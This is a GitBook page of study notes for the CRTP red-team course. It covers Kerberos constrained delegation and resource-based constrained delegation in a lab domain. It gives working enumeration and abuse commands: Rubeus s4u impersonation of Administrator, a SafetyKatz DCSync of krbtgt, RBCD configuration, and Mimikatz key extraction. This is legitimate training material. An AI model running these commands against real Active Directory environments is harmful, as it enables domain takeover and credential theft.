Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Constrained Delegation with Protocol Transiction
  • Labs
  • Resource-Based Constrained Delegation (RBCD)
  • Labs
  1. Certified Red Team Professional (CRTP) - Notes
  2. 7 - Kerberos Attack and Privelege Escalation
  3. 7.5 - Kerberos Delegation

Constrained Delegation

Constrained delegation allows a service to impersonate a user, but only to specific services on specific computers as defined in its configuration.

Example Scenario

  1. A user (e.g., Joe) authenticates to a web application using a method that does not support Kerberos.

  2. The web application, running under the websvc account, requests a TGS for Joe using S4U2Self.

  3. The KDC verifies the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag on the websvc account and that Joe is not restricted from delegation.

  4. If allowed, it returns a forwardable TGS for Joe.

  5. The web service now uses S4U2Proxy to request access to a service like CIFS/dcorp-mssql.dollarcorp.moneycorp.local.

  6. The KDC checks if this SPN is listed in msDS-AllowedToDelegateTo for websvc. If yes, it returns the TGS.

  7. The web service uses the TGS to access the target service as Joe.

Constrained Delegation with Protocol Transiction

If an attacker gains access to the websvc account, they can impersonate any user to access any service listed in msDS-AllowedToDelegateTo.

Enumeration

To find accounts with constrained delegation enabled:

  • PowerView:

    Get-DomainUser -TrustedToAuth
    Get-DomainComputer -TrustedToAuth
  • ActiveDirectory module:

    Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abuse via Rubeus

Request TGT and TGS in one step using Rubeus:

Rubeus.exe s4u /user:websvc `
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 `
/impersonateuser:Administrator `
/msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt

Then access:

dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Note: The SPN in the TGS is in clear-text, making it possible to target sensitive services even when delegation was configured for seemingly low-risk systems.

Alternate scenario (with /altservice parameter):

Rubeus.exe s4u /user:dcorp-adminsrv$ `
/aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b445 `
/impersonateuser:Administrator `
/msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL `
/altservice:ldap /ptt
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt"

Labs

Resource-Based Constrained Delegation (RBCD)

RBCD shifts delegation control from the front-end service (e.g., web server) to the target resource (e.g., database server). This is managed through the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, visible as PrincipalsAllowedToDelegateToAccount, which is stored on the resource. Unlike standard delegation types, SeEnableDelegation rights are not required. Any object with write permissions on the resource can configure RBCD.

To exploit RBCD effectively, you need:

  1. Write permissions over the target resource.

  2. Control over an object with an SPN, such as:

    • Local admin access to a domain-joined machine.

    • Ability to join a machine to the domain (default ms-DS-MachineAccountQuota = 10 for all users).


Enumeration and Exploitation

Identify write permissions with:

Find-InterestingDomainACL | ? { $_.IdentityReferenceName -match 'ciadmin' }

Set RBCD using the ActiveDirectory module:

$comps = 'dcorp-student1$','dcorp-student2$'
Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for the impersonating machine:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key with Rubeus to impersonate:

Rubeus.exe s4u /user:dcorp-student1$ `
/aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 `
/msdsspn:http/dcorp-mgmt `
/impersonateuser:administrator /ptt

Then access the machine:

winrs -r:dcorp-mgmt cmd.exe

Labs

PreviousUncostrained DelegationNext7.6 - Accross Trusts

Last updated 2 days ago

📝
9️⃣
Learning Object 16 lab
Learning Object 17 lab